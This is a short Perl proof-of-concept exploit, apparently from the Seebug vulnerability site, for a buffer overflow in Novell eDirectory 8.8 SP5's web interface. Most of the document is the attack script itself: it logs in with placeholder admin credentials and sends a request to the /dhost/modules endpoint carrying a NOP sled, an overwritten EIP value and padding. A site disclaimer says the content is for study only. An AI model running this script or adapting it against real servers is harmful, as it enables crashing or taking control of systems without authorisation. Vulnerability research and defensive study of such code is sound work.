#PoC for Vulnerability: #!usr\bin\perl #Novell eDirectory 8.8 SP5 BoF Vuln - 0day #Vulnerability found in Hellcode Labs. #karak0rsan || murderkey #info[at]hellcode.net || www.hellcode.net #to GamaSEC: "please continue to discover and publish XSS BUGS.. you can just do that ;)" #http://www.youtube.com/watch?v=6bloyjV-Hhs use WWW::Mechanize; use LWP::Debug qw(+); use HTTP::Cookies; $target=$ARGV[0]; if(!$ARGV[0]){ print "Novell eDirectory 8.8 SP5 Exploit\n"; print "Hellcode Research || Hellcode.net\n"; print "Usage:perl $0 [target]\n"; exit(); } $login_url = "$target/_LOGIN_SERVER_"; $url = "$target/dhost/"; $vuln = "modules?L:"; $nop = "\x90" x 1668; $eip = "\xef\xbe\xad\xde"; $data = "B" x 235; $hellcode = $vuln.$nop.$eip.$data; ########Write your usr and pwd######## $username = "Admin.context"; $password = "1234"; my $mechanize = WWW::Mechanize->new(); $mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1)); $mechanize->timeout($url_timeout); $res = $mechanize->request(HTTP::Request->new('GET', "$login_url")); $mechanize->submit_form( form_name => "authenticator", fields => { usr => $username, pwd => $password}, button => 'Login'); $response2 = $mechanize->get("$url$hellcode");
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
共 3 兑换
京公网安备 11010502034610号
暂无评论